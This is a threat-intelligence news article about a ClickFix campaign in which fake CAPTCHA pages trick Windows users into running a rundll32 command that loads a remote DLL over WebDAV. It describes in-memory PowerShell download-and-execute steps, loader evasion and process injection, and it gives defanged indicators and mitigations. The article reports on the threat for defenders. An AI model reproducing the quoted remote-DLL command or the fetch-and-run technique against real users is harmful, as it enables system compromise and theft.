A sophisticated new variant of the ClickFix attack is actively targeting Windows users, employing a novel combination of rundll32.exe and WebDAV to bypass prevalent PowerShell detection methods. This evolving threat landscape demands increased vigilance as attackers leverage built-in Windows functionalities to execute malicious payloads with reduced visibility.
The ClickFix technique, known for its deceptive social engineering, prompts users to manually execute commands that ultimately lead to system compromise. This latest iteration sharpens that approach by sidestepping script-based detection mechanisms, making it a significant concern for organizations relying solely on traditional security measures.
New ClickFix Variant Uses Rundll32 and WebDAV for Evasion
CyberProof analysts have identified a more advanced ClickFix attack variant that notably delegates the initial execution of malicious commands to rundll32.exe, paired with the WebDAV protocol. This departure from previous versions, which often relied on PowerShell or mshta, presents a significant challenge for security teams. WebDAV (Web Distributed Authoring and Versioning) is an extension of HTTP that, in this context, allows Windows to treat remote files as if they were local, facilitating the stealthy retrieval of malicious components.
The attack chain begins with a user being directed to a deceptive website, such as “healthybyhillary[.]com,” impersonating a CAPTCHA verification page. The site instructs the unwitting victim to press ‘Win + R’ to open the Windows Run dialog, paste a pre-prepared command using ‘Ctrl + V,’ and then press ‘Enter.’ This meticulously crafted social engineering tactic exploits user trust, leading them to inadvertently initiate the attack sequence.
By utilizing rundll32.exe with WebDAV, the attack bypasses common security alerts that typically flag direct PowerShell script execution. The command often takes the form of running a DLL from a remote server. For instance, a command like rundll32.exe \[email protected],#1 would instruct rundll32.exe to load the specified DLL from a remote source. The use of ordinal numbers (like #1) instead of named export functions further obfuscates the malicious activity, adding another layer of complexity for analysis.
Detection Evasion Through Native Windows Components and In-Memory Execution
The true sophistication of this ClickFix variant lies in its multi-stage execution strategy that largely remains in memory, minimizing its digital footprint. After the initial rundll32.exe execution fetches and loads a remote DLL via WebDAV, the infection chain transitions to PowerShell. However, this PowerShell execution often occurs later in the sequence and is carefully engineered to avoid detection.
Advanced techniques like Invoke-Expression (IEX) are employed in conjunction with Net.WebClient.DownloadString to pull and run subsequent payloads directly into memory. The use of non-interactive flags such as -NoP (NoProfile) and -NonI (NonInteractive) during PowerShell execution ensures that the process runs silently, without displaying any output or loading user profiles.
The core payload, identified as a secondary loader named SkimokKeep, is delivered as a 32-bit Windows DLL disguised as ‘verification.google.’ This loader employs several advanced anti-analysis techniques. Instead of directly importing Windows API functions, it navigates the Process Environment Block (PEB) to dynamically locate loaded system modules and resolves function addresses by using a hashing algorithm similar to DJB2. This method hides the specific Windows APIs the malware relies on, significantly complicating static analysis efforts.
Furthermore, the payload incorporates robust checks to detect and evade sandboxed or virtualized environments. It utilizes functions such as GetSystemMetrics, GetForegroundWindow, and GetSystemTime to identify anomalies. Additionally, anti-debugging mechanisms, including timing checks using GetTickCount and process ID inspection, are in place to alter the malware’s behavior or halt execution if it suspects it is being monitored by security researchers or automated analysis tools.
In a further effort to maintain persistence and evade detection, rundll32.exe injects code into legitimate running processes, such as chrome.exe and msedge.exe, by altering their memory. This technique helps the malware stay hidden in plain sight within normal system operations.
To mitigate this threat, security teams are strongly advised to implement comprehensive command-line auditing for all executions of legitimate Windows tools (LOLBins), particularly rundll32.exe, to identify unusual usage patterns. Monitoring for specific arguments associated with WebDAV, such as davclnt.dll and DavSetCookie, can be a strong indicator of malicious activity. Restricting or closely monitoring outbound WebDAV traffic on port 80 is also recommended where it is not operationally required.
Blocking connections to known malicious IP addresses, including 178.16.53[.]137, 141.98.234[.]27, 46.149.73[.]60, and 91.219.23[.]245, as well as suspicious domains like mer-forgea.sightup[.]in[.]net and data-x7-sync.neurosync[.]in[.]net, is crucial. Improving user awareness training to specifically address fake CAPTCHA pages and ClickFix-style social engineering attacks is paramount, as the success of this campaign relies heavily on user interaction.
The ongoing evolution of such attack techniques highlights the need for layered security approaches that go beyond signature-based detection. Organizations should focus on behavioral analysis, endpoint detection and response (EDR) capabilities, and proactive threat hunting to stay ahead of emerging threats like this new rundll32.exe and WebDAV-based ClickFix variant.